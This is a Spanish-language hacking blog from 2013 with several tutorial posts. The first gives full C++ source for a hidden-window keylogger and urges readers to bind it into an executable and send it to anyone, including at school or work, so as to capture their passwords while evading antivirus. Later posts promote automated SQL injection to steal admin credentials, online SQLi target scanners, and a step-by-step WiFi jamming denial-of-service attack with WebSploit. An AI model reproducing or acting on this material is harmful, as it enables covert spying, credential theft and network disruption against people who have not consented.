martes, 19 de noviembre de 2013

Como siempre, la parte mas interesante de hackear es espiar. Hoy les voy a mostrar como crear un código en C++ para crear un Keylogger. Un keylogger es un tipo de software o un dispositivo hardware específico que se encarga de registrar las pulsaciones que se realizan en el teclado, para posteriormente memorizarlas en un fichero o enviarlas a través de Internet. Esto suele ser muy divertido ya que podremos averiguar las contraseñas y datos personales de cualquier persona que use el ordenador que este infectado con nuestro Keylogger. Esta aplicación se puede usar en cualquier sistema como en la escuela, trabajo, etc.

Ventajas de usar un Keylogger:

  • Es un método muy simple y fácil de llevar a cabo.
  • Es un ataque silencioso  ya que la victima no se dará cuenta que esta siendo hackeada.
Como crear un Keylogger usando C++:

  • Instrucciones:
1. Instalar Dev C++ y ejecutarlo.
2. Dirigirse a File->New->Source File
3. A continuación, pegar el siguiente código en el espacio de trabajo en blanco.

#include <iostream> 
using namespace std; 
#include <windows.h> 
#include <winuser.h> 
int Save (int key_stroke, char *file);
void Stealth();

int main() 
{
Stealth(); 
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt"); 
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]"); 
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n"); 
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB) 
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}

4. Compilar el código, y para eso nos dirigimos a la ventana Execute y le damos a Compile (Ctrl+F9)


Cuando le den a Compile, verán algo como esto:



5. Cuando terminen, nos dirigimos a el directorio donde guardamos el programa ya compilado y veremos estos archivos, dentro de los cuales, estará el programa y un archivo de texto log.txt


6. Este archivo .txt es en donde se guardaran las teclas que se presionen mientras el programa se esta ejecutando. Lo único que nos queda es unir estos dos archivos en un .exe y mandarlo a quien queramos o ejecutarlo en el ordenador que queramos y todas sus contraseñas quedaran registradas!

¿Que es un Binder?

Un Binder es un software que se usa para combinar o esconder dos o mas archivos en un único archivo bajo el mismo nombre y extensión  Los archivos a combinar pueden tener cualquier nombre y extensión  solo depende de nosotros elegir el nombre y el icono del archivo combinado. Estos archivos combinados son mas peligrosos cuando están encriptados ya que pueden no ser detectados por un análisis de Antivirus





Los Mejores Binders:


  • Simple Binder:

  • Weekend Binder:



lunes, 18 de noviembre de 2013

jSQL es una herramienta que nos permite realizar ataques AUTOMATICOS de inyección SQL a paginas web vulnerables a este ataque y así obtener todos los datos del servidor, y con suerte, nos permitirá encontrar el usuario Admin con su respectiva contraseña.

Descarga:
http://code.google.com/p/jsql-injection/downloads/list




Métodos de inyección SQL disponibles en jSQL:

  • Metodos GET, POST, header, cookie.
  • normal, error based, blind, time based algorithms
  • Deteccion de Algoritmos automatica
  • Obtencion de datos automatica
  • Ajustes Proxy
  • Evasion
  • MySQL


domingo, 17 de noviembre de 2013

¿Que es Nmap ? Es una herramienta para administradores de sistemas y gente interesada en el escaneo de grandes o pequeñas redes para determinar los equipos que se encuentran activos y cuales son sus servicios.





Instruciones:


  1. Instalar Nmap ya sea en Windows o en Backtrack preferentemente ya que en Backtrack, Nmap viene ya instalado. En caso de que estés usando otra distribución de linux, solo ejecuta el comando: "apt-get install nmap"






  2. Ejecutar: nmap --script ip-geolocation-geobytes [ip que queremos escanear sin los corchetes]
  • Ejemplo: nmap --script ip-geolocation-geobytes 192.168.0.1
Luego de unos segundos, nos apareceran todos los datos de la IP con sus respectivas coordenadas. (Podemos localizarlas en un mapa con  Google Mapas)



sábado, 16 de noviembre de 2013

Las paginas que les voy a compartir a continuación  sirven para escanear cualquier pagina web que deseen en busca de vulnerabilidades a ataques SQL, el método mas empleado por todos los hackers del mundo. 

El primer paso para poder llevar a cabo este ataque es comprobar que la web que queremos atacar realmente sea vulnerable para ahorrarnos tiempo y muchos intentos en vano. Estas paginas son las mejores actualmente, son gratis, y muy fáciles de usar:
  • http://www.be007.gigfa.com/scanner/scanner.php
  • http://www.sunmagazin.com/tools/hack/SQLI-Scan
  • http://scanner.drie88.tk
  • http://wolfscps.com/gscanner.php
  • http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan

viernes, 15 de noviembre de 2013

i-FunBox es una utilidad que te permitirá gestionar tu iPhone desde el Escritorio de tu PC tal como si fuera una unidad más, una unidad de almacenamiento multimedia.

Su entorno está pensado para que puedas localizar esos elementos multimedia que sueles guardar en tu iPhone con facilidad. Mediante una serie de accesos directos, es posible explorar las carpetas donde se guardan los vídeos, las canciones, los fondos de pantalla, los tonos, las aplicaciones e incluso los archivos del sistema.

Transferir un archivo con i-FunBox es muy sencillo. Basta con conectar tu iPhone por USB, seleccionar el archivo que quieres transferir y arrastrarlo donde quieras. Así de simple. Sin configuraciones previas ni interminables sincronizaciones.







Descarga:












Utilidades:

  • Explorar el sistema de archivos SIN JAILBREAK!

  • Instalar Apps y Tweaks 

  • Permite usar tu dispositivo como dispositivo de almacenamiento USB

  • Conección por WiFi SSH







jueves, 14 de noviembre de 2013

Un Ataque de Denial of Service (Denegación de Servicios), es un ataque a un sistema de computadoras o red que como resultado provoca que un servicio o recurso sea inaccesible a los usuarios. Normalmente provoca la pérdida de la conexión de red por el consumo del ancho de banda de la red de la víctima. En este tutorial voy a mostrar como realizar este ataque a cualquier punto de acceso WiFi para que todos los usuarios que estén conectados se desconecte y para que nadie se pueda conectar nuevamente (durante el periodo de tiempo en el que el ataque este funcionando, no es permanente).


Requisitos:
  • Backtrack (Descarga)
  • No hace falta tener acceso a la red, solo necesitas que este a tu alcance.

Instrucciones:

  1. Una vez en Backtrack, tenemos que comprobar que tenemos instalado WebSploit. Para ello nos dirigimos a Applications >> BackTrack >> Exploitation Tools >> Web Explotation Tolls y aca debería encontrarse WebSploit, si en tu caso es asi, continua directamente en el paso 3. De lo contrario tendremos que instalarlo.
  2. Para instalar WebSploit, primero tendremos que descargarlo aquí. Una vez descargado extraemos el archivo en el directorio "/pentest/web/". Despues de extraerlo debemos hacer click derecho en el archivo websploit, seleccionamos "Properties" y en la ventana emergente nos dirigimos a la pestaña "Permissions" y seleccionamos la casilla "Allow executing file as program". Una vez hecho esto, solo nos queda ejecutar Websploit. Para ello, abrimos la consola/terminal de Backtrack y ejecutamos los siguientes comandos:
    • cd /pentest/web/websploit
    • ./websploit
  3. Luego de ejecutar Websploit, vamos a ejecutar los siguientes comandos:
    • use wifi/wifi_jammer
    • set essid [nombre essid del wifi]
    • set bssid [numero bssid del wifi]
    • set channel [your channel number]
    • RUN
NOTA: 
  • BSSID: Significa Basic Service Set Identifier y se trata de la dirección MAC (física) del Access Point al que nos conectamos. Lo podemos obtener mirando la tabla ARP si estamos conectados o mediante el comandoo "airodump-ng" para capturar el tráfico que genere.
  • ESSID: Significa Extended Service Set ID y es el nombre identificable de la red.
  • Para obtener el BSSID y el ESSID en Windows vamos a cmd y ejecutamos: netsh wlan show networks mode=bssid